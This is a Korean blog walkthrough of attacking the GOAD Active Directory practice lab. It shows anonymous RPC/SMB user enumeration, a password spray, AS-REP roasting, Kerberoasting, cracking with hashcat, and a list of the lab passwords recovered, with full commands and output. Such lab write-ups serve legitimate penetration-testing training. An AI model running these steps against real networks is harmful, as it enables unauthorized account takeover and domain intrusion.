GOAD 사용자 및 유저 열거
이전 포스팅인 GOAD 정찰 및 열거에서 GOAD의 네트워크에 대한 호스트를 스캔하고 각 호스트에 대한 포스 스캔을 진행하였다.
이번 포스팅에서는 각 도메인 별 호스트에 오픈되어있는 서비스를 기반으로 침투에 사용할 수 있는 유저 열거하는데 초점을 두고 진행한다.
sevenkingdoms.local, essos.local 도메인에 속한 모든 호스트를 대상으로 서비스 열거를 통해 유저를 추출하려했으나, north.sevenkingdoms.local 도메인에 속하는 호스트에서만 의미있는 정보를 획득할 수 있었다. 그렇기에 나머지 호스트들에 대한 기록은 제외했다.
north.sevenkingdoms.local
north.sevenkingdoms.local 도메인의 DC는 winterfell.north.sevenkingdoms.local이며 도메인 멤버로는 castelblack.sevenkingdoms.local이 존재한다.
winterfell.north.sevenkingdoms.local (192.168.56.11)
DNS
north.sevenkingdoms.local 도메인도 마찬가지로 dig 커멘드를 통해 any 레코드로 확인되는 또 다른 호스트는 발견할 수 없었다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kali)-[~]
└─# dig any north.sevenkingdoms.local @192.168.56.11
; <<>> DiG 9.18.16-1-Debian <<>> any north.sevenkingdoms.local @192.168.56.11
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6718
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;north.sevenkingdoms.local. IN ANY
;; ANSWER SECTION:
north.sevenkingdoms.local. 600 IN A 192.168.56.11
north.sevenkingdoms.local. 3600 IN NS winterfell.north.sevenkingdoms.local.
north.sevenkingdoms.local. 3600 IN SOA winterfell.north.sevenkingdoms.local. hostmaster.north.sevenkingdoms.local. 35 900 600 86400 3600
;; ADDITIONAL SECTION:
winterfell.north.sevenkingdoms.local. 3600 IN A 192.168.56.11
;; Query time: 0 msec
;; SERVER: 192.168.56.11#53(192.168.56.11) (TCP)
;; WHEN: Fri Dec 29 03:03:15 EST 2023
;; MSG SIZE rcvd: 158
RPC
winterfell.north.sevenkingdoms.local의 RPC에 익명으로 접근 시 아래와 같이 유저 열거가 가능하였으며, 그중 samwell.tarly 계정의 Description에서 패스워드를 확인할 수 있었음.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# rpcclient -U '' -N 192.168.56.11
rpcclient $> querydispinfo
index: 0x18dd RID: 0x455 acb: 0x00000210 Account: arya.stark Name: (null) Desc: Arya Stark
index: 0x18e3 RID: 0x45b acb: 0x00010210 Account: brandon.stark Name: (null) Desc: Brandon Stark
index: 0x172e RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x18e5 RID: 0x45d acb: 0x00000210 Account: hodor Name: (null) Desc: Brainless Giant
index: 0x18e8 RID: 0x460 acb: 0x00000210 Account: jeor.mormont Name: (null) Desc: Jeor Mormont
index: 0x18e6 RID: 0x45e acb: 0x00040210 Account: jon.snow Name: (null) Desc: Jon Snow
index: 0x18e4 RID: 0x45c acb: 0x00000210 Account: rickon.stark Name: (null) Desc: Rickon Stark
index: 0x18e7 RID: 0x45f acb: 0x00000210 Account: samwell.tarly Name: (null) Desc: Samwell Tarly (Password : Heartsbane)
index: 0x18e2 RID: 0x45a acb: 0x00000210 Account: sansa.stark Name: (null) Desc: Sansa Stark
index: 0x18e9 RID: 0x461 acb: 0x00000210 Account: sql_svc Name: (null) Desc: sql service
SMB
SMB 서비스에서는 익명으로 열거가 가능한 공유 디렉터리는 확인할 수 없었다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~]
└─# netexec smb '192.168.56.11' --shares
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] Error getting user: list index out of range
SMB 192.168.56.11 445 WINTERFELL [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(root㉿kali)-[~]
└─# netexec smb '192.168.56.11' -u '' -p '' --shares
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\:
SMB 192.168.56.11 445 WINTERFELL [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(root㉿kali)-[~]
└─# netexec smb '192.168.56.11' -u 'juicemon' -p '' --shares
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\juicemon: STATUS_LOGON_FAILURE
하지만 rpcclient에서와 같이 아래와 같이 netexec를 통해서도 유저를 열거할 수 있다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/Test]
└─# netexec smb '192.168.56.11' --users
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Trying to dump local users with SAMRPC protocol
SMB 192.168.56.11 445 WINTERFELL [+] Enumerated domain user(s)
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\Guest Built-in account for guest access to the computer/domain
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\arya.stark Arya Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\sansa.stark Sansa Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\brandon.stark Brandon Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\rickon.stark Rickon Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\hodor Brainless Giant
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\jon.snow Jon Snow
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\samwell.tarly Samwell Tarly (Password : Heartsbane)
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\jeor.mormont Jeor Mormont
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\sql_svc sql service
그럼 위에서 친절하게 설명에 적혀있는 samwell.tarly 계정은 정말 사용이 가능한지 여부를 파악하기 위해 아래와 같이 SMB를 대상으로 인증을 시도하고 공유 디렉터리를 열거하니 성공적으로 조회가 가능하였다.
그중 IPC$, NETLOGIN, SYSVOL에 대한 읽기 권한이 존재했지만 전부 흥미로운 사항은 존재하지않았다.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# netexec smb '192.168.56.11' -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 192.168.56.11 445 WINTERFELL [*] Enumerated shares
SMB 192.168.56.11 445 WINTERFELL Share Permissions Remark
SMB 192.168.56.11 445 WINTERFELL ----- ----------- ------
SMB 192.168.56.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 192.168.56.11 445 WINTERFELL C$ Default share
SMB 192.168.56.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 192.168.56.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 192.168.56.11 445 WINTERFELL SYSVOL READ Logon server share
Password Splay
유저명과 패스워드가 동일한 사용자를 찾는 패스워드 스프레이를 아래와 같이 진행 하기위해 rpcclient에서 조회된 값을 이용하여 모든 사용자 리스트를 제작하였다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# cat rpcclient.out | awk '{ print $8 }' > blind-users.txt
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# cat blind-users.txt
arya.stark
brandon.stark
Guest
hodor
jeor.mormont
jon.snow
rickon.stark
samwell.tarly
sansa.stark
sql_svc
이후 아래와 같이 SMB를 대상으로 패스워드 스프레이를 진행하니 hodor 계정의 패스워드가 유저명과 동일한것으로 확인된다.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# netexec smb '192.168.56.11' -u blind-users.txt -p blind-users.txt --no-brute --continue-on-success
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\arya.stark:arya.stark STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\brandon.stark:brandon.stark STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\Guest:Guest STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\hodor:hodor
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\rickon.stark:rickon.stark STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\sansa.stark:sansa.stark STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
Password Splay를 진행할 경우 패스워드 정책에 의해 계정이 잠길 수 있으니
netexec smb 'IP Address' --pass-pol를 통해 패스워드 정책을 확인 후 진행하는 것을 추천한다.
AS-REP Roasting
이번엔 north.sevenkingdoms.local에 Non PreAuth가 설정된 계정을 찾아 AS-REP Roasting을 진행한다. 공격을 위해 impacket-GetNPUsers를 사용하여 아래와 같이 brandon.stark 계정의 티켓을 확보할 수 있었다.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# impacket-GetNPUsers 'north.sevenkingdoms.local/' -usersfile valid-users.txt -dc-ip '192.168.56.11' -outputfile asreproasting.out
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:33f5c8d1f475188fd46bc5fd04e6e821$f6876d82cf0f92b3de41470102804283704df380483b5369f2015f9014b21a282578b9a99cbfa52e2d28746095e406270a6375123826d17a88256189745f1cd35a0137a0aeae2e8b9daa8ec2e211243879278a4a4bf86250a5c5313d83b1b9da548b22777cf2f2a598f2dd42e3b0faf66b6af881fa2882791ee9da862aa4911e471a66a7e81d1c7f4349da2156f0719b7d3b05c39b299612a78b7d051e56f7b243910390c906f2cfc75c6fc354af1e0f008137140f32dce938ffabee61ecf57a2e12505b1b6f80361a9a7d597c8851adf29c649ff87b08bf621be41c756e69f1ac715ad7434ca5b73d8be2b1127fd3f5ffaa0510e449c3479be7c5df697f28b0d4420b6bcba5
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
해당 티켓을 hashcat을 통하여 크랙하니 크랙이 성공하여 brandon.stark 계정의 패스워드까지 확보할 수 있었다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# hashcat -m 18200 -a 0 asreproasting.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i9-12900KF, 2914/5892 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:33f5c8d1f475188fd46bc5fd04e6e821$f6876d82cf0f92b3de41470102804283704df380483b5369f2015f9014b21a282578b9a99cbfa52e2d28746095e406270a6375123826d17a88256189745f1cd35a0137a0aeae2e8b9daa8ec2e211243879278a4a4bf86250a5c5313d83b1b9da548b22777cf2f2a598f2dd42e3b0faf66b6af881fa2882791ee9da862aa4911e471a66a7e81d1c7f4349da2156f0719b7d3b05c39b299612a78b7d051e56f7b243910390c906f2cfc75c6fc354af1e0f008137140f32dce938ffabee61ecf57a2e12505b1b6f80361a9a7d597c8851adf29c649ff87b08bf621be41c756e69f1ac715ad7434ca5b73d8be2b1127fd3f5ffaa0510e449c3479be7c5df697f28b0d4420b6bcba5:iseedeadpeople
현재까지 winterfell.north.sevenkingdoms.local 대상으로 서비스 및 유저를 열거하는 과정에서 확보한 계정은 총 3건으로 다음과 같다.
- north.sevenkingdoms.local\samwell.tarly:Heartsbane (User Description)
- north.sevenkingdoms.local\hodor:hodor (Password Splay)
- north.sevenkingdoms.local\brandon.stark:iseedeadpeople (AS-REP Roasting)
LDAP
위에서 다양한 방식으로 유효한 3개의 계정을 탈취할 수 있었다. 해당 계정들을 통해서 LDAP에 바인딩하여 유저 목록을 작성한다.
sevenkingdoms.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec ldap '192.168.56.10' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --users
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 192.168.56.10 389 KINGSLANDING [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 192.168.56.10 389 KINGSLANDING [*] Total of records returned 19
LDAP 192.168.56.10 389 KINGSLANDING Administrator Built-in account for administering the computer/domain
LDAP 192.168.56.10 389 KINGSLANDING Guest Built-in account for guest access to the computer/domain
LDAP 192.168.56.10 389 KINGSLANDING vagrant Vagrant User
LDAP 192.168.56.10 389 KINGSLANDING krbtgt Key Distribution Center Service Account
LDAP 192.168.56.10 389 KINGSLANDING tywin.lannister Tywin Lanister
LDAP 192.168.56.10 389 KINGSLANDING jaime.lannister Jaime Lanister
LDAP 192.168.56.10 389 KINGSLANDING cersei.lannister Cersei Lanister
LDAP 192.168.56.10 389 KINGSLANDING tyron.lannister Tyron Lanister
LDAP 192.168.56.10 389 KINGSLANDING robert.baratheon Robert Lanister
LDAP 192.168.56.10 389 KINGSLANDING joffrey.baratheon Joffrey Baratheon
LDAP 192.168.56.10 389 KINGSLANDING renly.baratheon Renly Baratheon
LDAP 192.168.56.10 389 KINGSLANDING stannis.baratheon Stannis Baratheon
LDAP 192.168.56.10 389 KINGSLANDING petyer.baelish Petyer Baelish
LDAP 192.168.56.10 389 KINGSLANDING lord.varys Lord Varys
LDAP 192.168.56.10 389 KINGSLANDING maester.pycelle Maester Pycelle
north.sevenkingdoms.local
이미 RPC와 SMB에서 사용자 열거를 통해 획득했던 목록이지만 다시 한번 기록한다 :)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec ldap '192.168.56.11' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --users
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 192.168.56.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 192.168.56.11 389 WINTERFELL [*] Total of records returned 17
LDAP 192.168.56.11 389 WINTERFELL Administrator Built-in account for administering the computer/domain
LDAP 192.168.56.11 389 WINTERFELL Guest Built-in account for guest access to the computer/domain
LDAP 192.168.56.11 389 WINTERFELL vagrant Vagrant User
LDAP 192.168.56.11 389 WINTERFELL krbtgt Key Distribution Center Service Account
LDAP 192.168.56.11 389 WINTERFELL arya.stark Arya Stark
LDAP 192.168.56.11 389 WINTERFELL eddard.stark Eddard Stark
LDAP 192.168.56.11 389 WINTERFELL catelyn.stark Catelyn Stark
LDAP 192.168.56.11 389 WINTERFELL robb.stark Robb Stark
LDAP 192.168.56.11 389 WINTERFELL sansa.stark Sansa Stark
LDAP 192.168.56.11 389 WINTERFELL brandon.stark Brandon Stark
LDAP 192.168.56.11 389 WINTERFELL rickon.stark Rickon Stark
LDAP 192.168.56.11 389 WINTERFELL hodor Brainless Giant
LDAP 192.168.56.11 389 WINTERFELL jon.snow Jon Snow
LDAP 192.168.56.11 389 WINTERFELL samwell.tarly Samwell Tarly (Password : Heartsbane)
LDAP 192.168.56.11 389 WINTERFELL jeor.mormont Jeor Mormont
LDAP 192.168.56.11 389 WINTERFELL sql_svc sql service
essos.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec ldap '192.168.56.12' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --users
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
LDAP 192.168.56.12 389 MEEREEN [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 192.168.56.12 389 MEEREEN [*] Total of records returned 13
LDAP 192.168.56.12 389 MEEREEN Administrator Built-in account for administering the computer/domain
LDAP 192.168.56.12 389 MEEREEN Guest Built-in account for guest access to the computer/domain
LDAP 192.168.56.12 389 MEEREEN DefaultAccount A user account managed by the system.
LDAP 192.168.56.12 389 MEEREEN vagrant Vagrant User
LDAP 192.168.56.12 389 MEEREEN krbtgt Key Distribution Center Service Account
LDAP 192.168.56.12 389 MEEREEN daenerys.targaryen Darnerys Targaryen
LDAP 192.168.56.12 389 MEEREEN viserys.targaryen Viserys Targaryen
LDAP 192.168.56.12 389 MEEREEN khal.drogo Khal Drogo
LDAP 192.168.56.12 389 MEEREEN jorah.mormont Jorah Mormont
LDAP 192.168.56.12 389 MEEREEN sql_svc sql service
각 도메인 별 유저 목록을 작성 후 다시한번 netexec를 통해 패스워드 스프레이(계정명과 동일한 패스워드, 현재까지 탈취한 계정들의 패스워드)를 진행했으나 발견된 계정은 없었다.
Kerberoasting
Active Directory 환경에서는 SPN이 설정된 유저가 존재한다. SPN(Service Principal Name)은 서비스 인스턴스의 고유 식별자로, Kerberos 인증에서 서비스 인스턴으를 서비스 로그온 계정과 연결하는데 사용된다.
즉 유효한 도메인 계정은 도메인 서비스에 대해 ST를 요청할 수 있다. 티켓은 Hashcat이나 John The Ripper와 같은 해시 크랙 도구를 통해 크랙될 수 있다!
사용자의 SPN을 조회하고 티켓을 발급받기위해 impacket-GetUserSPNs를 사용할 수 있다.
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# impacket-GetUserSPNs 'north.sevenkingdoms.local/samwell.tarly:Heartsbane' -dc-ip '192.168.56.11' -request -outputfile kerberoasting-north.sevenkingdoms.local.out
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------------------------- -------- ---------------------------------------------------------- -------------------------- -------------------------- -----------
CIFS/winterfell.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2023-12-28 03:41:00.459219 2024-01-02 01:42:17.382072 constrained
HTTP/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2023-12-28 03:41:00.459219 2024-01-02 01:42:17.382072 constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local sql_svc 2023-12-28 03:41:05.546731 2024-01-09 18:47:23.916579
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 sql_svc 2023-12-28 03:41:05.546731 2024-01-09 18:47:23.916579
1
2
3
4
┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# cat kerberoasting-north.sevenkingdoms.local.out
$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$a0fbad750dd4f43e2f8bc66d519bf0ac$199bcef071c5cd9350f8e807ab94708690dfc247559f592da010179eb5604d35aad1082ee7df32137f3f0d2d1b18b528216f1d524ddabb4cc4e1c8545c9b90f452a0faea6039b2dc5558858d47ea0d93533857a0184ff0d7c299c38bd4426517bc7eed2fea62714017f76eb6d3513eb14f20882a7819bda1864644038a35ccb226950c7e8784f6ed78a0286888b594efe7f505780cee55c60bfeebe11cf99d5acdb3f904a8424ddd05252216887841a7c8206ae5ef2b56abe0d447f63271da01aa5cac784979541d61f906b1f396c1ac14732ad6c8faee312e23b7c64fb2f818aaeb39c0a1374f99a4f4d446b4425e18cc8d93bfe920ea8b93c874b11f6588c59603a299be4329afafa47251c854d2e3979d97f223eaee0e2fb81f8a19b965eadf80a346ce2cb32e1aee1b9b51fa7c93ee0dc353816f846a0dda838bc5a088591e64a5cf665066f3ab5cb4a23a81530d59efd08a352aab3a8aa8b99f24b54d452a2d70f871bbb831a97a3bac7816d58e1e2faf253590f621601a12e89225516193b9d3357b62f7df58e5b9207a103a1ae3015fc0b8d8e5aff4c355264208f9bdd3eba851b0deffbae2c7329bb9729f317e4fde1a5e28aaf3e35bf1191dd3dd5c03fcb4ac1301afe3b6ca74e32e8b5402a8a15fa1254db381c6a2d28b92e57826137be780463ed72fd72acf0af66672df8a5d6e65e590d8ad660e75e8ed20dc0f83b29683e971f0d713ac6f0e3a01a5a89d9e85077849bd90b6865972537c71691a9d132a376178f7722fbe214e9a8a78989074a5e13ef0221f5cbbbc0926e0524f521ba373038743acdcefba66e3edc6f39086deda91b03a1a847f9b814505461ce07a0d71ae6aad0dd45819b1adffdfdb259ca07fe91bd16f172cedc9873ea01fe55e01bbbfc809ccdc19b678d9443eb5f2855f818503897f6e38a6b7c2fc16980e482e24fdfc22e3deb861c62e6035151257fd986e6f97fa4e3bebfe1d27680ed3cc4fcff763e9359ce56679c88cef12918e375d251fd1c76dc8cd52beda6a5b557c769ac247babead04933c7b2e6f6840addb329db7acbd36247daf9b0d7ddc1d18218303a8b129ea111a5f255b8a33022b0b42c8339f3df2318397116dd261300346831b5e35f48e4eca7abad2f2fe6b5d9b029a644c1d5aee1094880e083d989a01419e2784bc5b6b08325a74c9eadb93a0edcbe87f74aa702dc336aa456f59557a6e479f28047177fbc1a01da39bb7e4625a45044724eec1dd54e7488219c2e5514b1750a1d580165f9f1c1b5fe645c47021169f281d97834b8f2360e18562c8f3a5e0aef0657ffa52a4bc3b76b19771099e71b3c1328c09267fe309c000becda7b81dfad578cb5c58470e60d0ef897ff96e8efbadb18b3c4f272ac9cbe51d3b04cd835c962495e797c4593ad4609147b9fb1a456b37b9e5c353a15c835d79a7bacdafa16a2ef435e08ae63872f3df4fbf5216fcc29f3930ba986dbacd0c410f40900186cd9ff5b7c24ab9e0
$krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$4d0e7a39e0ec2ae7056f089d2848bd33$78ff3a56dda0672065559bf0e7130a515d5de4df05e553323201d113d98560e45303fb577674d60c85843b8529610f3c3f2847c9e931e2afb848e332d92734a82e81671d17e1bf2862d0a4f15e54bed1149ac6bb1c354fc1484652769936a6c958738b8cd27f3f1b66001972bff62f11d8d06c7e832a94a446736c292bf7ae142bfccf0e6cb1162ddde82e9bff96b47a42e55a3ddc624958305fe38ad5b4469a609c3acd5f362865f16b200a1b40d439974c1ac6b4c1446fb49767430cc8fb849e4aa2f6ef74ed6df839706b23b0b4817f27623a5915de161db66b32a58c5451a3e1174360d2b8e121f12851bee3154be86fe8c6bb3d4e7e901a7ddafa4cd52b58edb3d4da3cc7a3dd8fb1f4d33ba674832f80615feb1998ebeb319ad3784653aa3fa8932a5cc3444df475f1c7cb04ca8a151162ebc0bd93584cdeb5620d7bc30936516b1e7ae9c2c91c7792848eb4f5a54daeededbf7a49c300c7b2c2542a15fe819c0438079b51d027d11e11e94fa765ac294532adadf2f74b53931b151a5074883125c70508a1f2cf46de2c9366d7572b31ad0584bbe577fcfce7d0813259c42456dbb151dce05c389f766a6946ffe6fd6cdb0e11bb0435c5837163168a757ccfeb2eee221d15f40c12141166412fce9676224769fc5f1fa01a686725d71ecdf3427d2502bf8d40cfebcef48d3ba8d0a6ee6490db2007d1f1b19e2190d1cacd0a5a03b7b6ad64ba879a2454085f0a7917029988acd1b256929006daa8d11bbdcf1adf5d91ee3b16d4b6bc6a603788e90a9053a530f5880a37011f3b26d8100da406d12689865efca65059c4c28595dcb09d8c4d571e29283cec92f43c01bb94373f5a452b9883f517a2280f24d13666398d712902ce3828bc5cdf90ea72131ecaa5fc80405871a5c2c639ca67a163d397aa32d4b157f89e7e631824378d8c7b25f4816f6d4d8a0cf4886de74bda38fde6f478ebba45a93be88647ab5dcff40177ff0b2ef153d4a8837d58db3a0647cfa88d31293dc9579f82ad14673a1c613a962dbd68cab6be1be87524d949944f119770f2680349e0f381f9b666afbccf5659310b8ed4b5ee68787fa335b95e781da1163d96e7e6a42d3bf77086d21ce5702fc2e9a5c3db8f466b7f8fbf8f79f67c461fe568d290f36842ae32fa0d3be0f7c388f1fa983988fb952abe1c1621e62e3d87f08ac4fff76f22d0bf68de331a4bbcfbbd4806b4e8b025682a4321cab1958ef117609b5c1cf698ed3995afdeb666b796cc251ad4461b88d01c875bde456cabdfd0c7ad44d5a1cf4c4ae7cfb055f4fe5c86af492c2c9dda144461f8c35e1d3be1f41e26c05d77f9d53a2d225eaa6a47c048a1cfabc9d0526d84a794db0777541db8984e611a245a8e42d2c2ef0d0ad2c4c1dad74f2a0f9af9b1fcf9ee1969e0a46b466de906dd2291768cf33c4f8cb8492cdcdd7a4f9a8f3052e760aa24f11d3e90f074da9963f238b1bab3f2a8acd47b0c918113df317026b098a08e
AS-REP Roasting에서도 hashcat을 통해 티켓을 크랙하였다. 이때
-m옵션으로 전달되는 값은 해시 타입인데, Generic hash types에서 확인할 수 있으니 참고하면된다.
발급받은 티켓을 크랙하니 2개의 티켓 중 jon.snow 계정의 해시가 크랙되는 것을 확인할 수 있었고, 이렇게 네번째 계정까지 탈취할 수 있었다.
- north.sevenkingdoms.local\samwell.tarly:Heartsbane (User Description)
- north.sevenkingdoms.local\hodor:hodor (Password Splay)
- north.sevenkingdoms.local\brandon.stark:iseedeadpeople (AS-REP Roasting)
- north.sevenkingdoms.local\jon.snow:iknownothing (Kerberoasting)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# hashcat -m 13100 -a 0 kerberoasting-north.sevenkingdoms.local.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i9-12900KF, 2914/5892 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
